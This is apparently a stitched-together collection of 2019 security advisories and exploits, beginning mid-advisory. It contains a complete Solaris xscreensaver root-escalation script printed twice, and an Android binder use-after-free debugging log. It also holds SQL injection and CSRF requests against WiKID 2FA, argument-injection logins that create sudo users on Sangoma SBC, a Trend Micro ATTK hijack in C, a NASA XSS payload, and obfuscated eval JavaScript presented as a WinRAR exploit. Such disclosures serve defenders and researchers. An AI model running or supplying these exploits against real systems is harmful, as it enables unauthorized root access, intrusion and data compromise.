bash-3.2# chmod -s /usr/bin/xscreensaver

5. Proof of Concept.

An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
can be downloaded from:

https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Exploitation of a design error vulnerability in xscreensaver, as 
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the payload
echo "int getuid(){return 0;}"> /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -

# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation
# Date: 2019-10-16
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/
# Version: Solaris 11.x
# Tested on: Solaris 11.4 and 11.3 X86
# CVE: N/A

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Exploitation of a design error vulnerability in xscreensaver, as 
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the payload
echo "int getuid(){return 0;}"> /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -
 thread:e4fb2e00

I see proc->task_list ... 

PoC:

[  642.254192] wq queue:e7ce8798
[  642.254201] epoll struct:e7ce8780
[  642.254214] wq queue:e7ce8f98
[  642.254220] epoll struct:e7ce8f80
[  642.254230] wq queue:e7ce8718
[  642.254236] epoll struct:e7ce8700
[  642.254266] binder_ioctl: 7392:7392 40046208 0
[  642.254274] iovec str size:8
[  642.254280] thread->task_list:e5389b30
[  642.254286] proc->task_list:c309d86c
[  642.254292] binder_free_thread size:252 worker_off:44
[  642.254299] freed thread:e5389b00
[  642.254736] ep_unregister_pollwait struct:e7ce8780 epi struct:e51d0480
[  642.254792] ep_unregister_pollwait struct:e7ce8f80 epi struct:e51d0a80
[  642.254799] ep_unregister_pollwait list not empty
[  642.254805] whead before
[  642.254811] my2= c0f50cc4 c0f50cc4
[  642.254817] remove wait queue:e734b994
[  642.254823] remove wait queue task list:e734b9a0
[  642.254830] ep_unregister_pollwait list not empty
[  642.254835] whead before
[  642.254841] my2= c0f50cd0 c0f50cd0
[  642.254847] remove wait queue:e734bb24
[  642.254852] remove wait queue task list:e734bb30
[  642.254863] ep_free
[  642.254873] ep_free
[  642.254881] ep_free

However bug is not triggered in my PoC. I cannot see doubly list entiries under thread and proc :/


Here is where the use after free bug should come in.

Code:

ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);

When this is called, the binder_thread structure is freed in the kernel.

Immediately after the parent process calls:

Code:

b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);

In the kernel, memory is allocated to copy over iovec_array from userspace. This poc depends on the pointer from this allocation, to be the same as the recently freed binder_thread memory.

Then, when the child process exits, the EPOLL cleanup will use the waitqueue in the binder_thread structure, that has been overwritten with the values in iovec_array. When EPOLL cleanup unlinks the waitqueue, 0xDEADBEEF will get overwritten by a pointer in kernelspace. This has to happen just before the writev call in the parent process starts to copy over the second buffer, which gets us a kernel space memory leak.

If writev is returning 0x1000 it means the timing is off, the wait queue offset is off, the kmalloc allocation in the writev function isn't the same as the freed binder_thread, or your kernel isn't vulnerable. 

```

## Update 1

```
I narrowed it down ... so I want to replicate behavior of com.cyanogenmod.lockclock

It behaves like I want it to see:

    s3ve3g:/ # ps | grep 2140                                                    
    u0_a50    2140  257   845744 36336 sys_epoll_ b4ed9114 S com.cyanogenmod.lockclock

Source:

https://github.com/LineageOS/android_packages_apps_LockClock

    [   53.617686] binder_ioctl: 2140:2401 40046208 0
    [   53.617697] iovec str size:8
    [   53.617704] thread->task_list:e5b2c030
    [   53.617710] proc->task_list:e609206c
    [   53.617716] p list= e609206c e50c3e7c
    [   53.617722] p list= e50c5e7c e609206c
    [   53.617729] binder_free_thread size:252 worker_off:44
    [   53.617736] freed thread:e5b2c000
    [   53.617755] ep_unregister_pollwait struct:e5f5c680 epi struct:e5f4c280
    [   53.617762] ep_unregister_pollwait list not empty
    [   53.617768] whead before
    [   53.617773] my2= e8b10308 e8b10308
    [   53.617779] remove wait queue:e5fd755c
    [   53.617785] remove wait queue task list:e5fd7568
    [   53.617803] ep_free

I think Binder is used here:

    https://github.com/LineageOS/android_packages_apps_LockClock/blob/5239d22272aa2b7a2bcf2c45482395da3e163289/src/org/lineageos/lockclock/DeviceStatusService.java

Any idea how to replicate this using C (native) code?


```

WiKID Systems 2FA Enterprise Serverversion 4.2.0-b2032 and earlier was
found to be vulnerable to multiple Cross-Site Scripting, SQLi, and CSRF
issues.

*searchDevices.jsp* is vulnerable to SQL injection through the *uid* and
*domain* parameters.  The application uses Postgres which supports Stacked
Queries, the issue can be seen by submitting a request like:

SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k  -X
'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary
"uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search"
https://$HOST/WiKIDAdmin/searchDevices.jsp

The request will cause the database to sleep for 10+ seconds.  This issue
has been assigned *CVE-2019-16917*.

*processPref.jsp* is vulnerable to SQL injection through the *key* parameter
if the action parameter is set to *update.*  The following request will
trigger the issue for an authenticated user:

https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);--

The request will cause the database to sleep for 5+ seconds.  This issue
has been assigned *CVE-2019-17117.*

*Logs.jsp* is vulnerable to SQL injection through the *substring *and
*source* parameters.  The following request will demonstrate the issue:

time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE"
--data-binary "source='; select pg_sleep(5);--"
https://$RHOST/WiKIDAdmin/Log.jsp

real    0m10.572s
user    0m0.008s
sys     0m0.016s

The request will cause the database to sleep for 5+ seconds.  This issue
has been assigned *CVE-2019-17119*

*usrPreregistration.jsp *is vulnerable to cross site scripting by uploading
a malicious .csv file containing <script> elements. This issue has been
assigned *CVE-2019-17114*

*Logs.jsp *is vulnerable to cross site scripting by triggering errors in
the unauthenticated portion of the application. The errors are severe
enough to appear in the logs by default.  This issue has been assigned
*CVE-2019-17115.*

*groups.jsp *is vulnerable to cross site scripting by creating a group with
a name that contains <script> elements. This issue has been assigned
*CVE-2019-17116*

*adm_usrs.jsp *is vulnerable to cross site scripting when an admin is
created with a username containing <script> elements. This issue has been
assigned *CVE-2019-17120*

The application does not implement CSRF protection.  Tricking an
authenticated user to click a link like:

<a href="https://$RHOST/WiKIDAdmin/adm_usrs.jsp?usr=pentest&newpass1=password1&newpass2=password1&action=Add">WiKIDAdmin
Manual</a>

Will result in an admin user unintentionally being created. This issue has
been assigned *CVE-2019-17118*

https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-csrf
https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-cross-site-scripting
https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-sql-injection

AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE P:801.995.6999
[image: SecurityMetrics]

## Introduction

### Description

A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to create a privileged user on the system using the web application login interface.

### Vulnerability Type

- Argument Injection or Modification (https://cwe.mitre.org/data/definitions/88.html)

## Product Overview

A Sangoma SBC protects both your data and voice network and is designed to handle every aspect of phone calls that travel over the internet (or voice-over-ip phone calls).

## Background

The Sangoma SBC web application heavily relies on the python script `/usr/local/sng/bin/sng-user-mgmt` for various user operations including authenticating the user that is supplied on the login screen of the web application.

When a username and password is provided to the application, it is processed by `/var/webconfig/gui/Webconfig.inc.php` which uses the `Execute` function from `/var/webconfig/api/ShellExec.class.php` to pass the credentials to `/usr/local/sng/bin/sng-user-mgmt` as arguments. The `Execute` function applies the `escapeshellcmd` function to convert any shell characters as literals, however there is no verification that the variables passed do not contain strings that can be interpreted as additional arguments to `/usr/local/sng/bin/sng-user-mgmt`.

For example, when a username `root` and password `secure` is passed to the application, the final command that is created by `Execute` to be run is `/usr/local/sng/bin/sng-user-mgmt --action=login --user=ha --encrypted-password=ENCPASS(secure)`

By inspecting the code and help menu of `/usr/local/sng/bin/sng-user-mgmt`, we see that the `action` parameter supports other modes which includes `add` that creates a user. The `-o` option can be used to make the user have sudo privileges when `--action=add` is used.

Passing additional arguments through the username field results in a new privileged user being created on the system.

## Proof of Concept Exploit

1. Pass a username with the value `john --action=add -p StrongPass1 -o`
2. The password field can be set to anything as this will be ignored
3. Click login
4. A local user with sudo privileges called `john` with password `StrongPass1` will be created
5. An attacker can SSH into the machine with these credentials or login via the web console

## Versions Tested

- 2.3.23-119-GA

## Vendor Response

This issue has been responsibly disclosed to the vendor for which a patch has been released in version 2.3.24

https://wiki.sangoma.com/display/SBC/SBC+Downloads

## Credits

Appsecco Security Team
http://www.appsecco.com

## Timeline

18th May 2019: Discovered and reported to vendor
21st May 2019: Vendor confirmation
23rd July 2019: Fixed version (2.3.24) released

## Reference

- [https://www.sangoma.com/products/sbc/](https://www.sangoma.com/products/sbc/)


Riyaz Walikar

+91 9886042242

<http://www.appsecco.com/>www.appsecco.com<http://www.appsecco.com/>

Appsecco is a registered trademark of Appsecco Ltd. Appsecco Limited: Registration Number: 9500721. Registered office: Kemp House, 152 to 160 City Road, London EC1V 2NX, United Kingdom. This email message is intended for the named recipient only. It may be privileged and/or confidential. If you are not the named recipient of this email please notify us immediately and do not copy it or use it for any purpose, nor disclose its contents to any other person.

## Introduction

### Description

A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to bypass authentication and login as a non-existen user but with complete access to the dashboard including additional privileged user creation capabilities.

### Vulnerability Type

- Argument Injection or Modification (https://cwe.mitre.org/data/definitions/88.html)

## Product Overview

A Sangoma SBC protects both your data and voice network and is designed to handle every aspect of phone calls that travel over the internet (or voice-over-ip phone calls).

## Background

The Sangoma SBC web application heavily relies on the python script `/usr/local/sng/bin/sng-user-mgmt` for various user operations including authenticating the user that is supplied on the login screen of the web application.

When a username and password is provided to the application, it is processed by `/var/webconfig/gui/Webconfig.inc.php` which uses the `Execute` function from `/var/webconfig/api/ShellExec.class.php` to pass the credentials to `/usr/local/sng/bin/sng-user-mgmt` as arguments. The `Execute` function applies the `escapeshellcmd` function to convert any shell characters as literals, however there is no verification that the variables passed do not contain strings that can be interpreted as additional arguments to `/usr/local/sng/bin/sng-user-mgmt`.

The `/var/webconfig/gui/Webconfig.inc.php` calls the `WebSetSessionAuthenticated()` function if the return value of the `$shell->Execute($cmd, $args, true, array('log','escape'=>true))` is 0 as shown below.

```
$rc = $shell->Execute($cmd, $args, true, array('log','escape'=>true));
if(0 == $rc){
    ...
    ...
    WebSetSessionAuthenticated();
}else{
    Logger::SysLog("webconfig", "login - ${username} login failed");
    ...
    ...
}
```

The Operating System returns a 0 if the `/usr/local/sng/bin/sng-user-mgmt` program exits successfully.

This is true for all arguments of the program unless an explicit status code is sent back to the Operating System. Invoking the help menu, for example is also a successful execution of the program as can be seen from the below two commands

```
# /usr/local/sng/bin/sng-user-mgmt -h
Usage: sng-user-mgmt [options] arg

Options:
  -h, --help            show this help message and exit
  -a ACTION, --action=ACTION
                        Action to perform.
  -u USER, --user=USER  User Name
  -s, --syslog          Log to syslog
  -p PASSWORD, --password=PASSWORD
                        Password
  -f FORCE, --force=FORCE
                        Force to remove a user
  -n NAME, --name=NAME  User Name
  -e ENCRYPTEDPASSWORD, --encrypted-password=ENCRYPTEDPASSWORD
                        Encrypted Password
  -d HASHEDPASSWORD, --hashed-password=HASHEDPASSWORD
                        Hashed Password
  -l ACCESS, --access=ACCESS
                        Toggle user login access, ie. Enable / Disable
  -o, --sudoer          Add to sudoer list
root@sangoma-test ~
# echo $?
0
```

As the status code is 0, the check in `/var/webconfig/gui/Webconfig.inc.php` passes and a new user session is created.

Passing additional arguments through the username field that would cause the `sng-user-mgmt` to return a 0 would result in a session being created without any valid credentials being supplied. This session provides complete access to the application, including the ability to create additional sudo privilged users.

## Proof of Concept Exploit

1. Pass a username with the value `adam -h`
2. The password field can be set to anything as this will be ignored
3. Click login
4. The `-h` invokes the help menu for `sng-user-mgmt`, returning a 0 and causing `Webconfig.inc.php` to create a new session.
5. You are now logged in

## Versions Tested

- 2.3.23-119-GA

## Vendor Response

This issue has been responsibly disclosed to the vendor for which a patch has been released in version 2.3.24

https://wiki.sangoma.com/display/SBC/SBC+Downloads

## Credits

Appsecco Security Team
http://www.appsecco.com

## Timeline

18th May 2019: Discovered and reported to vendor
21st May 2019: Vendor confirmation
23rd July 2019: Fixed version (2.3.24) released

## Reference

- [https://www.sangoma.com/products/sbc/](https://www.sangoma.com/products/sbc/)


Riyaz Walikar

+91 9886042242

<http://www.appsecco.com/>www.appsecco.com<http://www.appsecco.com/>

Appsecco is a registered trademark of Appsecco Ltd. Appsecco Limited: Registration Number: 9500721. Registered office: Kemp House, 152 to 160 City Road, London EC1V 2NX, United Kingdom. This email message is intended for the named recipient only. It may be privileged and/or confidential. If you are not the named recipient of this email please notify us immediately and do not copy it or use it for any purpose, nor disclose its contents to any other person.

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security          


[Vendor]
www.trendmicro.com


[Product]
Trend Micro Anti-Threat Toolkit (ATTK)
1.62.0.1218 and below

Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections.
It can be used to perform system forensic scans and clean the following infection types:

General malware infection
Master boot record Infection
CIDOX/ RODNIX infection
Rootkit infection
Zbot infection
Cryptolocker infection
etc..


[Vulnerability Type]
Remote Code Execution


[CVE Reference]
CVE-2019-9491


[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author
happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be
placed in the vacinity of the ATTK when a scan is launched by the end user.

Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings
are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as
each time the Anti-Threat Toolkit is run so can an attackers malware.

Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.)

attk_collector_cli_x64.exe 
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed


[References]
https://success.trendmicro.com/solution/000149878
*All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223


[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.

#include <windows.h>

void main(void){
   puts("Trend Micro Anti-Threat Toolkit PWNED!");
   puts("Discovery: hyp3rlinx");
   puts("CVE-2019-9491\n");
   WinExec("powershell", 0);
}


[POC Video URL]
https://www.youtube.com/watch?v=HBrRVe8WCHs


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Cross-site Scripting (XSS) Vulnerability in NASA through User Agent - Binit Ghimire

As of October 19, 2019, there exists a Reflected Cross-site Scripting (XSS) vulnerability in a sub-domain of the official NASA website as a result of the User Agent HTTP request header getting displayed in the webpage. The vulnerability was discovered on October 11, 2019 and a video was uploaded to YouTube regarding the reproduction of the vulnerability.

Vulnerable URLs:
1. https://nodis3.gsfc.nasa.gov/search_ft.cfm
2. https://nodis3.gsfc.nasa.gov/suggestions_action.cfm

Proof-of-Concept (PoC) Video: https://youtu.be/O-KtSUUqnzM

How to Reproduce?
Step 1: Visit https://nodis3.gsfc.nasa.gov/search_ft.cfm
Here, you will be able to see that it displays your User-Agent in the form of "Your browser is {User-Agent}". In my case, it displays "Your browser is Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0".

Step 2: Then, open your browser's Developer Tools, and add a custom User Agent string containing the following XSS payload:
<svg/onload=alert(document.domain)>

You can also modify the value of User Agent by intercepting the GET request sent to the server while visiting https://nodis3.gsfc.nasa.gov/search_ft.cfm and then forwarding the request.

I have explained about this in the Proof-of-Concept (PoC) video along with this vulnerability report.

Step 3: Now, visit the webpage with the modified User Agent value, and you will be able to see the XSS payload in the User Agent getting executed.

Author Details:
Name: Binit Ghimire
Profile: https://packetstormsecurity.com/user/binit/
Webpage: https://binitghimire.com.np
Twitter: @WHOISbinit (https://twitter.com/WHOISbinit)
Facebook Page: https://www.facebook.com/TheBinitGhimure
Facebook Profile: https://www.facebook.com/InternetHeroBINIT
GitHub: https://github.com/TheBinitGhimure
LinkedIn: https://www.linkedin.com/in/thebinitghimire/

# Exploit Title: winrar memory corruption
# Exploit Author: albalawi-s
# Vendor Homepage: https://win-rar.com
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: [5.80]
# Tested on: [Microsoft Windows Version 10.0.18362.418 64bit]
#https://twitter.com/test_app_______

------------------------------------------------
# poc video
https://www.youtube.com/watch?v=NVDVP33kHuU

# POC

1- open winrar or any file.rar
2- help
3- help topics
4- Drag the exploit.html to the window


--------------------------------------------------
Save the content html

******************************************

<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
"\\\\,l=x.length;for(i=0;i<l;i++){y%=127;o+=String.fromCharCode(x.charCodeAt" +
"(i)^(y++));}return o;}f(\\\"\\\\K_RG^Q[B\\\\\\\\031OKSOYQP\\\\\\\\027b}*7))" +
"x\\\\\\\\033:\\\\\\\\025$w!(:.p9&'$x3&-0,f\\\\\\\\000\\\\\\\\177&r\\\\\\\\0" +
"25\\\\\\\\000O\\\\\\\\000\\\\\\\\013\\\\\\\\010\\\\\\\\026\\\\\\\\006\\\\\\" +
"\\034\\\\\\\\000\\\\\\\\010\\\\\\\\007\\\\\\\\t1LO\\\\\\\\023\\\\\\\\036\\\\"+
"\\\\034\\\\\\\\007\\\\\\\\021\\\\\\\\033\\\\\\\\002J$[3>AE\\\\\\\\\\\"\\\\\\"+
"\\\\\\\\\"\\\\?^qXk:jm}k+dyz\\\\\\\\177=tcf}c+K:\\\\\\\\\\\\\\\\bkuo{l|\\\\" +
"\\\\003\\\\\\\\002@KKRBF]\\\\\\\\027w\\\\\\\\016\\\\\\\\000\\\\\\\\037s\\\\" +
"\\\\022\\\\\\\\017nAh[\\\\\\\\nUW]C\\\\\\\\005`ObQ|2!1-52g$($,9,)*m\\\\\\\\" +
"rp\\\\\\\\005\\\\\\\\026\\\\\\\\0065%1).u\\\\\\\\0313=0\\\\\\\\004\\\\\\\\0" +
"04>AZ9\\\\\\\\024;\\\\\\\\0065\\\\\\\\0307\\\\\\\\002MNO4\\\\\\\\030\\\\\\\\"+
"037S\\\\\\\\007\\\\\\\\035\\\\\\\\032WX%\\\\\\\\010'\\\\\\\\022]^ Rgw$vnk(4" +
"*H~ho{u^pyqvb?D;Mh\\\\\\\\177owoT\\\\\\\\017qKAIJ{\\\\\\\\n\\\\\\\\000\\\\\\"+
"\\n\\\\\\\\013p_rA\\\\\\\\020\\\\\\\\021\\\\\\\\022pUYZ\\\\\\\\027KQV\\\\\\" +
"\\025nHP\\\\\\\\027\\\\\\\\034c\\\\\\\\036a\\\\\\\\030g%*,g/3)\\\\\\\\021l\\"+
"\\\\\\023r\\\\\\\\rpztu\\\\\\\\n%\\\\\\\\0047z{|\\\\\\\\016;+@\\\\\\\\022\\" +
"\\\\\\n\\\\\\\\017DXF)\\\\\\\\007\\\\\\\\035\\\\\\\\002\\\\\\\\002\\\\\\\\0" +
"02\\\\\\\\nNOPQ.\\\\\\\\001(\\\\\\\\033VWX%\\\\\\\\010'\\\\\\\\022AQsbpjtq8" +
"[zUd7\\\\\\\\177n|f`e2gmes*D;n~di1uAWCPGWOW\\\\\\\\\\\\\\\\u\\\\\\\\010\\\\" +
"\\\\025p_rAVD\\\\\\\\\\\\\\\\P@\\\\\\\\\\\\\\\\YY\\\\\\\\030\\\\\\\\\\\\\\\\"+
"B\\\\\\\\023\\\\\\\\025\\\\\\\\035Ec2\\\\\\\\035,\\\\\\\\03703'5h+?-*(<omq\\"+
"\\\\\\016q\\\\\\\\010wm\\\\\\\\013*\\\\\\\\0054\\\\\\\\007(;1-@I\\\\\\\\024" +
"\\\\\\\\002\\\\\\\\026E\\\\\\\\017GUIZPL\\\\\\\\004NSPDBCDEFGCY\\\\\\\\023P" +
"WT^{]p_jYr[|k\\\\\\\\177mjh|/;,2O6m\\\\\\\\\\\"\\\\&D;!GnApCT\\\\\\\\\\\\\\" +
"\\~QxKzS^HX\\\\\\\\013NXHIUC\\\\\\\\000\\\\\\\\023\\\\\\\\t\\\\\\\\025TB^__" +
"I\\\\\\\\007aLc.\\\\\\\\0356%+7fo!iwk|vn&pmrfdefgcy3pwt~$<\\\\\\\\023>\\\\\\"+
"\\r8\\\\\\\\021:\\\\\\\\023\\\\\\\\n\\\\\\\\034\\\\\\\\014\\\\\\\\r\\\\\\\\" +
"t\\\\\\\\037\\\\\\\\\\\\\\\\O[LR\\\\\\\\021\\\\\\\\001\\\\\\\\023\\\\\\\\02" +
"0\\\\\\\\022\\\\\\\\nB&\\\\\\\\t \\\\\\\\023\\\\\\\\\\\"\\\\t|^qXkZslfi~ah`" +
"{>e{gxp6*8{o}zxl-\\\\\\\\033}P\\\\\\\\177JXzUtG\\\\\\\\026\\\\\\\\004_N\\\\" +
"\\\\\\\\\\\\F@E\\\\\\\\014\\\\\\\\017\\\\\\\\033]SV\\\\\\\\\\\\\\\\\\\\\\\\" +
"007\\\\\\\\006YSYG\\\\\\\\037//.,%!{\\\\\\\\033j,2ce\\\\\\\\021lq\\\\\\\\01" +
"4#\\\\\\\\016=hz7i\\\\\\\\004+\\\\\\\\0065`r<0\\\\\\\\004\\\\\\\\030\\\\\\\\"+
"\\\\\\\\?\\\\\\\\0269\\\\\\\\010[G\\\\\\\\001\\\\\\\\036\\\\\\\\006\\\\\\\\" +
"000SLFKAI\\\"\\\\,47)\\\"(f};)lo,0(rtsbus.o nruter};)i(tArahc.x=+o{)--i;0=>" +
"i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)74=!)31/l(tAedoCrahc.x(elihw;lo=l,ht" +
"gnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\")"                                 ;
while(x=eval(x));
//-->
//]]>
</script>